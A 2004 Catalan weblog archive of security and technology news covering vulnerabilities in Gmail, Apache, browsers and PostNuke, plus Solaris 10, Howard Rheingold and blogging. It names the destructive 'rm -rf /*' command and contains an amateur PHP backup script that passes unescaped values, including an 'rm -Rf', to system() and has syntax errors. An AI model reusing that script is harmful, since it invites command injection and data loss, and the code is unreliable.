|
Weblog d'en Xavi Caballé
 |
diumenge, 31 / octubre / 2004 |
Honeypots Revealed, interessant document sobre la funció dels honeypots com eina per descobrir noves vulnerabilitats de seguretat.
|
23:58 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Infoworld] Sun to launch next version of Soalris on Nov. 15. El proper dia 15 de novembre es presenta oficialment la nova versió de Solaris, per a les plataformes SPARC, Intel x86 i (per primera vegada) AMD.
Solaris 10 es un important pas endavant en l'evolució de Solaris, amb nombrosos canvis tant a nivell d'interfície d'usuari (adopció de Gnome com entorn d'escriptori per defecte), com a nivell d'arquitectura (introducció de dTrace) i, fins a tot, a nivell més profà (impossibilitat de fer un rm -rf /*). Addicionalment, Sun planeja publicar una versió de Solaris 10 sota llicència de codi obert, en un intent de posicionar-lo com una alternativa a Linux (encara que això no ho farà fins a finals d'any com molt aviat). No obstant això, avui en dia es possible baixar-se còpies per a ús personal de Solaris 9 i 10 (aquestes última, versions beta); m'imagino que aquesta política de distribució continuarà un cop publicat Solaris 10.
Gràcies, Jesús per l'enllaç a la notícia.
|
17:53 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[República Internet] Sra. Mula: tiene derecho a un abogado. Resum d'un reportatge publicat pel diari El País/Negocios (requereix subscripció) on es pregunta a sis advocats sobre si el nou codi penal penalitza als usuaris d'Internet fins a l'extrem de portar-los a la presó.
José María Anguiano - Garrigues
Sí
A mi juicio, siempre ha sido delito descargarse música por Internet. (...) De esta forma se penaliza la fabricación, distribución e incluso la posesión de medios tecnológicos que faciliten la supresión no autorizada o la neutralización de las medidas de protección. De esta forma, cualquiera que suba a la Red una obra protegida que previamente haya tenido que desproteger se le podrá aplicar este apartado del artículo 270.
(...)
Martí Mannet - Derecho.com
No
Para que sea delito es necesario que el que realiza la descarga lo haga con ánimo de lucro y en perjuicio de un tercero.
(...)
Carlos Sánchez Almeida - Buffet Sánchez Almeida
No
Descargarse música por Internet no es delito, si no hay ánimo de lucro.
De fet l'advocat de Garrigues és l'únic que defensa el sí.
Per a més detalls, us recomano la lectura de l'article «El nou codi penal crea incertesa a la xarxa».
|
14:26 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
El Quadern del Diumenge d'«El Periódico» (estarà disponible a la web la setmana vinent) inclou una extensa entrevista de la Carme Jané a Howard Rheingold, feta just abans de la presentació del llibre a l'ArteFutura dijous passat.
M'imagino que es l'últim ressò mediàtic de la visita que va començar dimarts passat. L'entrevista es realment molt completa i tracta sobre la influència de la tecnologia i els telèfons mòbils a la societat actual, de la derrota del PP arran els fets de l'onze de març, els weblogs, la política nord-americana, el seu desconeixement sobre UMTS (com gairebé tots els mortals, no l'ha vist per enlloc)...
Com a curiositat, Howard Rheingold també fa servir un Treo 600.
Pregunta: Ara sembla que la gran amenaça per a la premsa escrita són els diaris interactius (weblog).
Respota: Per no ser considerat analfabet, avui un no solament ha de llegir i escriure, sinó que s'ha de saber comunicar. En el futur, el diari no tindrà paper o tinta, però seguirà necessitant redactors que facin judicis, trobin històries, comprovin si són certes o no... el periodisme no desapareixerà.
|
13:24 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Una sèrie d'articles que descriuen el model de seguretat utilitzat a la versió per a telèfons mòbils de Windows Mobile:
|
13:09 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
dissabte, 30 / octubre / 2004 |
Als comentaris del post anterior sobre els caixers automàtics ha sortit el tema de la usabilitat.
Jo personalment sempre he trobat una cosa dels caixers de «la Caixa» que em fa molta gràcia: els teclats porten els números en relleu, en braille. Això pot fer creure que es per facilitar als cecs l'ús dels caixers. El problema es que la majoria de les operacions es realitzen a través de la pantalla tàctil, que evidentment no està a l'abast de les persones cegues.
|
22:55 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Dimarts, 2 de novembre, a la universitat Pompeu Fabra (auditori de l'estació de França): Seminari públic de la SIGOSSEE a Barcelona.
Per cert, mireu la plana web i veureu-ho com la universitat Pompeu Fabra no fa els honors a Pompeu Fabra. És al·lucinant la quantitat de faltes d'ortografia que hi ha!!!
|
21:56 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[The Register] Gmail accounts 'wide open to exploit' - report. Hi ha una vulnerabilitat del tipus XSS a GMail, que pot ser utilitzada per accedir a la bústia dels usuaris sense necessitat de tenir la contrasenya d'accés.
La vulnerabilitat consisteix en robar el fitxer de cookies de l'usuari, a través d'un enllaça especialment formatejat, per tal d'utilitzar la cookie de GMail per accedir al compte de correu directament.
|
19:31 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Caspa.tv] Es literario ¿vale? L'Antonio se n'ha adonat d'una pífia de la secció sobre weblogs que publica el Ciberpais. Parlen d'un weblog literari, amb personatges de ficció i els presenten com a reals (i fins i tot, que els han entrevistat).
|
13:15 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[InfoWorld] Windows ATMs raise security concerns. Els caixers automàtics acostumen a fer servir Windows... i les que encara fan servir OS/2 ja estan en procés de migració doncs IBM deixarà de donar-hi suport l'any 2006.
La setmana passada es va saber que els caixers operats per dues empreses van ser afectades pel cuc W32/Nachi. Estem davant una nova amenaça?
|
12:56 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
divendres, 29 / octubre / 2004 |
No fa ni quatre dies que va sortir l'Apache 1.3.32 i ja tenim una nova versió, la 1.3.33.
Es tracta d'una actualització de seguretat:
SECURITY: CAN-2004-0940 (cve.mitre.org)
mod_include: Fix potential buffer overflow with escaped characters in SSI tag string. [Martin Kraemer, Jim Jagielski]
Buffer overflow in the get_tag function in mod_include for Apache 1.3.x to 1.3.32 allows local users who can create SSI documents to execute arbitrary code as the apache user via SSI (XSSI) documents that trigger a length calculation error.
A SecuritTeam hi ha una prova de concepte.
|
10:14 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[La Vanguardia] A La Contra, Howard Rheingold: «El móvil será el control remoto de tu vida».
Sin móviles, ¿hoy gobernaría el PP?
-Seguramente. Del mismo modo que, sin móviles, no nos hubiéramos enterado jamás de la gripe del pollo asiática...
-¡No me asuste! ¿Se contagia por móvil?
-No, no. Me refiero a que las autoridades chinas intentaron ocultar la enfermedad a la vieja usanza maoísta: simplemente prohibieron hablar de ella a todo el mundo.
-¿Y cómo nos llegamos a enterar?
-En un solo día, salieron de China 150 millones de mensajes SMS de advertencia a todos los países del planeta.
|
10:09 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Publicat el calendari d'activitats de la parada a Barcelona de la Gira de l'oficina espanyola del W3C, els propers 9 i 10 de novembre. Dimarts per la tarda, així com tot el dimecres el protagonista serà l'autobús dels estàndards.
Dimecres pel matí es faran conferències de presentació de l'oficina espanyola del W3C, una xerrada sobre els diferents estàndards establerts per World Wide Consortium. Després es parlarà de la web semàntica i els aspectes legals del codi obert i la interacció amb aplicacions mòbils.
|
07:18 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[The Age] Professor 'horrified' by poor security. Ho diu ben clarament:
Under no conditions should anyone in their sane mind run intelligence analytical systems on a Microsoft platform," he says. He recommends "Solaris version eight or better" as a secure platform for intelligence systems and says the only way to secure a Microsoft-based system would be by "air gapping", or disconnecting the computer system completely from the internet.
|
06:50 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Microsoft ha publicat un interessant article, How A Criminal Might Infiltrate Your Network, on s'analitza un atac tipus a una xarxa informàtica. L'article no tracta pas sobre com realitzar un atac sinó que ensenya com els atacants treuen profit dels nostres errors. Bona lectura.
|
06:46 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[News.com] Europe likely to opt for biometric passports. Dijous passat, els ministres europeus van acordar la introducció de mesures d'identificació biomètriques als passaports. La mesura consisteix en emmagatzemar dins d'un xip informació sobre la cara, l'aspecte físic i les petjades, a més d'una còpia digitalitzada de la foto.
|
06:43 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
 WinHex és un editor hexadecimal especialment pensat per a ser utilitzat en tasques d'anàlisis forense i recuperació de dades, accés a baix nivell, tasques de seguretat. Permet inspeccionar fitxers, recuperar fitxers esborrats o dada oculta al disc dur, tractar amb sistemes de fitxers corruptes, edició de la memòria RAM, interpretació de dades...
|
06:22 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
dijous, 28 / octubre / 2004 |
Hispasec ha celebrat avui el seu sisè aniversari. No s'ha fet res d'especial, però el 28 d'octubre de 1998 va sortir el primer «una-al-día».
|
21:15 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Via fernand0]
Me permito recomendar un par mas, no tan relacionados, pero que vale la pena nombrar: El profesional de la información ante los weblogs (pdf), de Mario Lledó, y Weblogs y periodismo participativo, de Tíscar Lara (la periodista que nos coloca a dos grados de separación de Dave Winer ;) ).
Saco algún trozo:
Los weblogs, por su propia naturaleza, están dando un ejemplo de transparencia a los medios de comunicación tradicionales, ya que gran parte de su fuerza radica en el uso extensivo de los hiperenlaces y del comentario abierto. Casi nada.
Y luego,
De entre las posibles adaptaciones que podemos imaginar y desear, se podrían adoptar como obligatorio incorporar los links a las fuentes de las noticias que tengan presencia online, aportar los textos originales de los que se hayan seleccionado fragmentos -por ejemplo, la trascripción completa de una entrevista editada-, pedir la opinión de los lectores en temas de su especialidad, escribir reportajes de acuerdo a las sugerencias o pistas de los lectores, ofrecer el material en bruto de los artículos en los que se esté trabajando e invitar a los lectores a contribuir al mismo.
|
21:04 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[InfoWorld] Suse warns of hole in Linux kernel. Una vulnerabilitat que permet atacs de denegació de servei es considera com a crítica:
Linux distributor Suse has warned of one of the most serious security holes to date in Version 2.6 of the Linux kernel, which could allow attackers to shut down a system running 2.6-based software.
As an alternative to updating the kernel, users can disable firewall logging of IP and TCP options, but this isn't recommended.
|
06:33 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
dimecres, 27 / octubre / 2004 |
[Kriptópolis] Anuncia (una vegada més!!!) el seu adéu...
Kriptopolis.com no volverá a ser actualizado, y sus contenidos quedarán a disposición de la Red como una especie de archivo histórico o hemeroteca, testigo de una época que pasó.
Dicho esto, ya sólo me queda darles la buena noticia...
Doncs res, curiosos per saber la bona notícia...
|
15:35 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Netcraft] Hacked PostNuke Site Distributes Malicious Code. El servidor de distribució del projecte de codi obert PostNuke ha estat compromès. L'atac ha modificat el codi emmagatzemat al servidor de contingut de forma que es distribuïa un codi malèvol cada vegada que algú descarregava el programa. El servidor ha estat compromès durant més de 32 hores.
PostNuke users who installed a zip archive downloaded between 11:50 pm Sunday night and 8:30 a.m. today face a grim scenario. According to a statement on the PostNuke site, all data submitted during the installation - including the server name, database credentials, admin name and password - were likely sent to the hackers. In addition, "in one file there was code allowing a malicious user to execute any shell command on the web server."
|
07:52 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Queue] The Magic of RFID. Una bona introducció a RFID. No entra en consideracions de privadesa, sinó només analitza la tecnologia: com funciona, beneficis que aporta, presentació, estàndards...
|
07:48 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Linux Journal] Geolocation by IP Address. La geolocalització per adreça IP és la tècnica per a determinar la localització greogràfica de l'usuari (latitud, longitud i, en conseqüència, la ciutat) comparant l'adreça IP pública de l'usuari amb les adreces d'alguns servidors, routers i localitzacions conegudes. L'article parla dels beneficis i els motius per a utilitzar aquesta tècnica i com integrar-la dins d'aplicacions web o comunitats d'usuaris.
|
07:37 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
«El Periódico» publica un complet i interessant article, a doble pàgina, sobre com els weblogs estan influencient en la campanya electoral dels Estats Units, «L'atac dels 'bloggers'»: primera pàgina i segona pàgina.
|
00:23 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
dimarts, 26 / octubre / 2004 |
Aquesta tarda he estat a l'FNAC de l'Illa a la presentació de l'edició en castellà del llibre «Multitudes Inteligentes. La próxima revolución social», que és la traducció del llibre «Smart Mobs». La presentació ha estat a càrrec de Howard Rheingold (a la foto), autor del llibre, acompanyat de José Luis de Vicente, sots director d'ArteFutura, i Roberta Bosco, del Ciberpais.
A la presentació hi he anat amb dos amics: en fernand0 (que estava a Barcelona i amb qui m'he trobat a l'hora de dinar) i pj. En fernand0 ha estat tota l'estona donant-li a la càmera de fotos, així que m'imagino que demà veurem una munió de fotos a la seva pàgina (algunes de curioses, com els apunts que he anat escrivint).
Crònica
El primer en parlar ha estat el José Luis de Vicente que ha fet la presentació de Howard Rheingold com una cronista que ha sabut identificar i canalitzar els punts de canvi provocats per la tecnologia i el seu impacte social, com la simulació electrònica, la informàtica personal, Internet i ara els telèfons mòbils.
A continuació la Roberta Bosco ha parlat sobre com les màquines canvien la forma de pensar i transmetre la informació, tant a nivell pràctic com a nivell de l'idioma (la forma en que s'escriuen els SMS es ben diferent a la forma en que escrivim al paper). També ha fet alguna referència als aspectes negatius, com el control sobre l'individu i l'espionatge de l'activitat.
Howard Rheingold: «No som víctimes de la tecnologia»
Per començar ha explicat la seva alegria de visitar Barcelona, doncs considera que és una de les ciutats on la tecnologia ha canviat més la forma de viure de les persones i que aquesta integració s'ha fet d'una forma crítica.
Per Rheingold, la tecnologia no s'ha d'analitzar en funció dels equips, sinó com les persones fan servir les eines per a fer coses bones o dolentes. Ha posat un parell d'exemples: a començaments dels anys vuitanta, els PC eren poc més que una joguina; avui en dia han canviat la nostra forma de treballar. El segon exemple és Internet, que ha passat de ser una eina d'ús eminent científic a una autèntica eina que ha canviat la nostra forma de vida.
Avui en dia, per a bé o per a pitjor, el poder ha passat d'estar damunt la taula a estar dins de les nostres butxaques. Malgrat que avui encara considerem el telèfon com això, un telèfon, no falta molt per a una integració efectiva entre el PC, Internet i els telèfons mòbils... tot això crearà un nou mitjà. Howard Rheingold tot just està començant a veure les primeres manifestacions de com aquest nou i poderós mitjà està començant a prendre forma.
A continuació ha explicat com els telèfons mòbils i els missatges de text ja són utilitzats habitualment per a l'organització de les activitats culturals, econòmiques, polítiques i socials. Ha posat tres exemples d'indicadors d'aquestes noves formes d'organització i construcció política: el cas de les Filipines que explica al llibre, les vagues de Corea i l'ascens de Howard Dean dins la política americana. Un altre exemple ben evident ha estat el passat 11 de març i els esdeveniments posteriors.
De totes formes, ha advertit Rheingold que no totes les accions que veurem seran necessariament d'un tipus democràtic. Segurament veurem com s'utilitzen aquestes tecnologies per a promoure actuacions violentes i feixistes.
Howard Rheingold ha volgut insistir que nosaltres tenim la responsabilitat de modelar la tecnologia; no serveix l'excusa de que som víctimes de l'ús de la tecnologia. Cal conèixer quines són les possibilitats com a primer pas per a poder fer-ne un ús positiu.
Primer a Europa i Japó
També ha comentat com la utilització dels telèfons mòbils com a nou mitjà de comunicació va començar primer a Europa i Japó. Als Estats Units tot just comença i considera que d'aquí a un any els americans estaran a un nivell semblant a l'europeu. Això contrasta amb la visió que tenen els nord-americans que ells són el rovell de l'ou a nivell tecnològic. El motiu d'aquest desfasament és fruit de l'actuació directa de les operadores telefòniques (més interessades en el guany ràpid)
D'altra banda Howard Rheingold considera que les noves tecnologies són un factor clau en la reducció del forat entre els països pobres i els països rics. Com exemple, el cas de la Xina durant l'esclat de l'epidèmia SARS. Mentre el govern xinès intentava amagar la situació, els ciutadans xinesos van fer servir els telèfons mòbils (125 milions de SMS durant tres dies) per difondre dades sobre la malaltia. Això segurament va ajudar a controlar la propagació de l'epidèmia.
És important tenir en compte que cada zona adaptarà les noves tecnologies en la seva forma particular i que allò que hem fet nosaltres no necessàriament ha de ser aplicable a d'altres països.
Un altra utilització de les noves tecnologies es per facilitar la comunicació entre els familiars que estan repartits arreu del món: una cambrera tailandesa que treballa a Noruega es comunica amb els seus familiars directes que viuen als Estats Units, Austràlia, Alemanya i Tailàndia exclusivament amb l'enviament de SMS.
Influència a la política
Als Estats Units encara les tecnologies dels telèfons mòbils es fan servir d'una forma molt embrionària, però enguany veu un parell d'usos molt interessants durant les properes eleccions: coordinadar les activitats de les persones que motiven als electors a anar a votar; la segona és la monitorització del procés: la presència dels telèfons facilitarà que no es produeixin accions il·legals en el procés de recompte.
Una altra aspecte que ha tractat es com les noves tecnologies són una amenaça als mitjans de comunicació tradicionals (TV, ràdio, premsa...) i que això dóna un enorme poder als ciutadans, poder polític, econòmic i social. Els mitjans responen utilitzant les seves influències davant els governs en la lluita amb tota mena d'armes.
Per evitar això és molt important que les persones sàpiguen pensar: encara hi ha gent que es creu tot allò que rep a la seva bústia i que Bill Gates farà un donatiu si ells reenvien un missatge.
Finalment unes fotos que vull destacar:
Les sabates que portava Howard Rheingold... tot un modelet!!!
La dedicatòria que m'ha signat.
fernand0, amb corbata!!!
|
23:38 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Publicada una nova versió de PuTTY, la 0.56. Es tracta d'un client telnet i ssh (v1 i v2) per a Windows, força popular. Possiblement el principal avantatge de PuTTY respecta a la resta de clients és la seva portabilitat... amb només un fitxer EXE es pot executar a qualsevol màquina, sense que calgui instal·lar-lo ni fer res.
Addicionalment, PuTTY (per cert, un projecte de codi obert) incorpora tot un conjunt d'eines addicionals, com un port de scp (còpia de fitxers segura a través de la xarxa), sftp (ftp amb tràfic xifrat), agent SSH per a l'automatització de connexions, etc...
Aquesta nova versió soluciona un forat de seguretat a les versions anteriors on un servidor SSHv2 pot atacar al client abans de la verificació de la clau de l'equip, de forma que fins i tot podem ser atacats per un servidor abans de poder comprovar si realment és el servidor on els volem connectar.
Addicionalment incorpora una sèrie de funcions addicionals, com per exemple la possibilitat de reiniciar una sessió dins d'una finestra no activa.
|
22:52 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Barrapunto] El Ministro Montilla abre las puertas al dominio .CAT. També en parlen al Diari de Barcelona i a La Malla.
Jo continuo sent molt escèptic en aquest tema... Subscric el que diuen a add-ct.info:
Tant de bo aquesta sigui una afirmació feta amb ple coneixement de causa, però, sincerament, creiem que el ministre ha confós el domini .cat, sobre el què no té competències, i el domini .ct, sobre el què el seu ministeri té totes les competències. Montilla confonia també PuntCAT, que reivindica el domini lingüístic .cat des de principis de 2004, amb l'ADD-CT, que reivindica el domini territorial .ct des de 1996.
(...)
Des d'aquí hem de recordar un cop més que .cat pretén ser un domini temàtic per a la comunitat catalana internacional, perseguit a cop de talonari, mentre el domini .ct és un dret natural de qualsevol país normal.
|
06:41 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[MozillaNews] Google's Browser Plans. El registre del domini gbrowser.com per part de Google és indicador dels seus plans per publicar una versió personalitzada de Firefox?
|
06:23 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
dilluns, 25 / octubre / 2004 |
JPEGScan és una eina gratuïta per a la identificació i reparació d'imatges JPEG que contenen codi per treure profit de la vulnerabilitat MS04-028 de Windows.
DiamondCS JPEGScan is a free, small, fast and easy-to-use scanner that has detection and repair capabilities for JPEG files infected with the MS04-028 exploit. It can detect all known variants of the exploit, and accomplishes this not by string searching or anti-viral signature scanning but rather by properly walking through all blocks in the JPEG searching for the undersized boundaries in comment sections that indicates the presence of MS04-028 infection. Repairing renders the file harmless by readjusting undersized boundaries to their proper size, and if the file was based on a real JPEG then it should also become viewable. If you simply want infected files deleted rather than repaired, JPEGScan can handle that also. JPEGScan also allows for one-click integration into Explorer's context menu, allowing you to easily right-click on any file, directory or drive and start scanning immediately for infected JPEG images.
|
06:56 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
diumenge, 24 / octubre / 2004 |
La publicació anglesa "The Register" publica un informe on s'analitza el model de seguretat utilitzat per Windows i Linux, per tal de determinar les diferències entre els dos sistemes. Es tracta d'un intent de sistematitzar els punts forts i febles de cada entorn i, amb aquesta informació, intentar extreure unes conclusions.
Continuació...
|
21:39 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
 La història de l'assetjament de la ciutat de Troia, explicada en clau de ciència ficció on els deus són uns humans que disposen d'una tecnologia que els permet fer viatges a través del temps i interactuar amb els personatges mítics de l'exèrcit grec. El llibre no es d'una lectura fàcil, ja que correspon a aquesta nova tendència de la ciència ficció on es barregen diverses situacions temporals i històries, mesclant-les en capítols alterns. Així no s'explica una única història i si no portes una lectura molt regular i concentrada és fàcil perdre's.
És a dir, que no és el millor llibre per portar al tren.
A més a més, la història queda totalment tallada. L'editor de la versió en castellà ha decidit publicar la novel·la original anglesa en dos volums separats (per així poder vendre un llibre al doble del preu del que la majoria estaria disposat a pagar).
Títol: Ilión. El asedio («Ilium»)
Autor: Dan Simmons
Editorial B
1a edició, 368 pàgines
|
18:42 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[News.com] Vulnerability hits Java for cell phones. Un investigador polac ha descobert dues vulnerabilitats a la versió per a telèfons mòbils de Java que, en circumstàncies molt especials, poden ser utilitzades per accedir a dades privades o fins i tot deixar el telèfon en un estat totalment inoperatiu.
|
14:24 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Dynamic Mixed Duopoly: A Model Motivated by Linux vs. Windows. Estudi econòmic on s'analitza la competència entre Linux i Windows en el segment de servidors. Cal posar èmfasi en que és això, un model econòmic i teòric on per exemple no es consideren aspectes tècnics (s'assumeix que Windows i Linux ofereixen les mateixes prestacions).
This paper analyzes a dynamic mixed duopoly in which a profit-maximizing competitor interacts with a competitor that prices at zero (or marginal cost), with the cumulation of output affecting their relative positions over time. The modeling effort is motivated by interactions between Linux, an open-source operating system, and Microsoft's Windows in the computer server segment, and consequently emphasizes demand-side learning effects that generate dynamic scale economies (or network externalities). Analytical characterizations of the equilibrium under such conditions are offered, and some comparative static and welfare effects are examined.
Segons aquest estudi, Windows té l'avantatge de la base instal·lada i això farà difícil una penetració de Linux al mercat. L'estudi també analitza els efectes de la pirateria (que beneficia a Microsoft).
|
11:45 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Linux Server Hacks] Using ricbornover ssh. Guia pas a pas per utilitzar rsync amb SSH per sincronitzar els directoris de dos màquines, de forma ràpida i segura.
|
10:42 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Sifry's Alerts] Oct 2004 State of the Blogoshpere: Corporate Bloggers. Quarta part d'una sèrie d'articles sobre el creixement dels weblogs i el seu impacte a nivell d'usuari, empreses, mitjans de comunicació, polítics i tecnologia.
La primera part va tractar sobre el creixement del weblogs. A la segona part es va analitzar el nombre de posts dels weblogs. La tercera part es dedica a la creixent influència dels weblogs, comparant-los amb la presència online dels mitjans de comunicació tradicionals. Aquesta quarta part tracta sobre un nou segment de weblogs: els weblogs corporatius, on de forma oficial (o semi-oficial) es parla sobre allò en que s'està treballant. Com exemples, s'indiquen els weblogs dels empleats de SAP, Sun i Microsoft (en aquests dos últims casos, l'empresa encoratja als empleats a mantenir el seu weblog).
|
10:27 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
dissabte, 23 / octubre / 2004 |
No sóc un especialista en SQL, però com toca fer còpies de seguretat periòdiques d'una base de dades MySQL, mirant per aquí i allà he acabat amb aquest script PHP que bàsicament fa servir mysql_hotcopy de les diverses bases de dades i després les comprimeixo:
#!/usr/bin/php -q
<?php
$username = "dbusername";
$password = "password";
$backupdir= "/backup";
$link = mysql_connect($s, $username, $password);
$db_list = mysql_list_dbs($link);
while ($row = mysql_fetch_object($db_list))
{
$dbname = $row->Database;
# Hotcopy
$script = "mysqlhotcopy $dbname -u $username
--password="$password"
--allowold $backupdir";
$results = system($script,$retval);
echo "RESULTAT: $results\n
CODI SORTIDA: $retvaln";
# Comprimir els fitxers
$script = "tar czf $backupdir/$dbname.tgz
$backupdir/$dbname";
$results = system($script,$retval);
echo "\n CREANT FIXTER TAR:\n $results\n
CODI SORTIDA: $retvaln";
# Esborrar directori
$script = "rm -Rf $backupdir/$dbname";
$results = system($script,$retval);
echo "\n ESBORRAR DIRECTORI:\n $results\n
CODI DE SORTIDA: $retvaln";
}
?> Qualsevol suggeriment de millora es benvingut.
|
23:55 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
A mitjans de novembre està prevista la publicació de la versió 1.0 (no beta) del Firefox... i això sembla un bon motiu per muntar una festa: la Fire...festa 1.0.
|
23:40 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[The Register] Windows versus Linux security: the real facts. Interessant columna d'opinió sobre la comparació del cost de la seguretat a Linux i Windows. L'autor de l'article desmonta els arguments utilitzats per Microsoft a les seves campanyes publictàries. I per demostrar-ho, publiquen un completíssim informe (disponible en format HTML i PDF). Lectura recomanada.
|
21:52 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
ISECOM anuncia un software, SecurityNOW!, basat en la metodologia OSSTMM que realitza:
- Realització d'una valoració objectiva de la seguretat
- Determinació del risc (Risk Assessement Value, RAV)
- Determinar el cost financer de les mesures de seguretat d'una organització.
- Determinar l'impacte econòmic d'implementar fins a cinc noves iniciatives de seguretat
- Generació automàtica d'un informe sobre la situació actual de la seguretat i el cost d'implementació de noves mesures.
|
21:36 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
divendres, 22 / octubre / 2004 |
[Slashdot] Big Day for Browser Vulnerabilities. En un dia s'anuncia una munió de vulnerabilitats a l'Internet Explorer (marcades com a molt crítiques), Opera (moderadament crítica), Mozilla 1.7.x i Firefox 0.x (menys crítica), Safari (moderadament crítica), Netscape 7.x (menys crítica), Konqueror (menys crítica), Avant Browser (moderadament crítica) i MyIE2 1.x (moderadament crítica).
Concretament els problemes són:
- Internet Explorer (fins a SP1 de Windows XP). No es realitza una validació adequada dels esdeveniments d'arrossegar i desar entre la zona d'Internet i la zona local. Pot permetre l'execució de codi dins de la zona local.
- Internet Explorer (totes les versions, inclosa la que hi ha al SP2 de Windows XP) que pot ser utilitzada a través d'un fitxer .HHK per tal d'executar codi dins de la zona local.
- Opera, Mozilla 1.7.x i Firefox 0.x, Safari 1.x, Netscape 7.x, Konqueror 3.x, Avant Browser 10.x i 9.x i MyIE2 1.x una pestanya no activa pot visualitzar un quadre de diàleg a la pestanya activa. Això es pot utilitzar per enganyar a l'usuari, fent-lo creure que el quadre pertany a una web diferent. Es pot utilitzar per robar informació.
Hi ha disponible una prova de concepte.
|
21:13 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Com es fan realment les eleccions a Florida, utilitzant les màquines de Diebold... paròdia, o potser no tant.
Disponible en format Windows Media (també funciona amb el Winamp) i Quicktime.
|
17:03 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
dijous, 21 / octubre / 2004 |
Del 3 al 5 de novembre es celebra a Barcelona l'edició europea de la RSA Conference, una de les més prestigioses reunions internacionals sobre seguretat informàtica.
La conferència que organitza l'empresa RSA Security s'ha convertit amb els anys en un esdeveniment de referència per a conèixer la visió que es té de la seguretat informàtica, les noves tendències i les tecnologies que comencen a implementar-se. Es celebren tres edicions arreu del món, una en Estats Units, una altra a Japó i altra a Europa que, enguany es realitza en la ciutat de Barcelona.
La RSA Conference ja no és aquell esdeveniment gairebé revolucionari de les primeres edicions que tan magistralment descriu Steven Levy al llibre «Cripto». Els anys han institucionalitzat el programa passant de ser una reunió de hackers on es tractava sobres usos futurs (i gairebé eteris) de la criptografia a un macro-esdeveniment on representants de la indústria parlen sobre el present, el futur immediat i les tendències a llarg termini de tots els aspectes relacionats amb la seguretat informàtica.
Les edicions actuals, no obstant, conserven intacte tot el seu prestigi i aconsegueixen reunir a alguns dels personatges més influents. En l'edició d'enguany a Barcelona està anunciada la presència de Tom Davis (congressista nord-americà que presideix el grup de treball de tecnologies de la informació, responsable de les noves legislacions que s'estan adoptant en Estats Units i que, en gairebé tots els casos són vistes per molts com retallades en la llibertat dels usuaris d'Internet), Richard Kaplan (vicepresident de Microsoft responsable de l'àrea de negoci de seguretat i la unitat de tecnologia), Art Coviello (CEO de RSA Security), Richard Clarke (president de Good Harbor Consulting, LCC, empresa consultora sobre temes de seguretat nacional dels Estats Units, ciberseguretat i terrorisme) i Howard Schmidt (ex-conseller del president dels Estats Units sobre temes de seguretat informàtica i actualment responsable de seguretat informàtica d'eBay).
A més d'aquestes ponències, hi ha un gran nombre de sessions tècniques sobre seguretat aplicada, el negoci de la seguretat informàtica, els atacants i les amenaces; gestió de l'accés i la identitat, implementació de sistemes de seguretat informàtica, defensa perifèrica; privadesa, legislació i política, seguretat dels serveis web, etc... En el moment de redactar aquesta nota, hi ha anunciada un total de setanta sessions tècniques, els detalls de les quals poden consultar-se en la pàgina web de l'esdeveniment.
Finalment, un gran nombre d'empreses estaran presents a l'àrea d'expositors presentant els seus productes i serveis.
En definitiva, un esdeveniment de referència imprescindible per a estar al dia sobre la seguretat informàtica, coneixent les noves tendències del mercat i com les diferents empreses veuen la situació i les mesures que proposen aplicar.
Aquest text també l'ha publicat Hispasec.
|
23:32 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Bruce Schenier es pregunta al seu weblog els productes de codi obert són més segurs que el codi propietari? I la seva resposta és que no hi una resposta fàcil. Coincideixo amb ell, i de fet és el que durant molt de temps també he dit a tothom que m'ho pregunta: la disponibilitat del codi font, per se, no garanteix la seguretat.
Per a garantir la seguretat d'un codi font cal analitzar-lo i això no és pas una tasca senzilla i la simple disponibilitat del codi font no vol dir pas que algú faci aquesta auditoria. Evidentment, la disponibilitat del codi font pot permetre que es realitzi aquesta tasca. Schneier cita els exemples de Linux, Apache i OpenBSD com exemples dels nivells de seguretat on poden arribar els productes de codi obert. Jo trauria de la llista l'Apache, ja que la versió 2.x s'està demostrant poc segura... però en el seu lloc ficaria el Sendmail que, d'ençà la revisió del codi i la realització d'auditories s'ha demostrat com un producte ben sòlid.
|
21:23 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
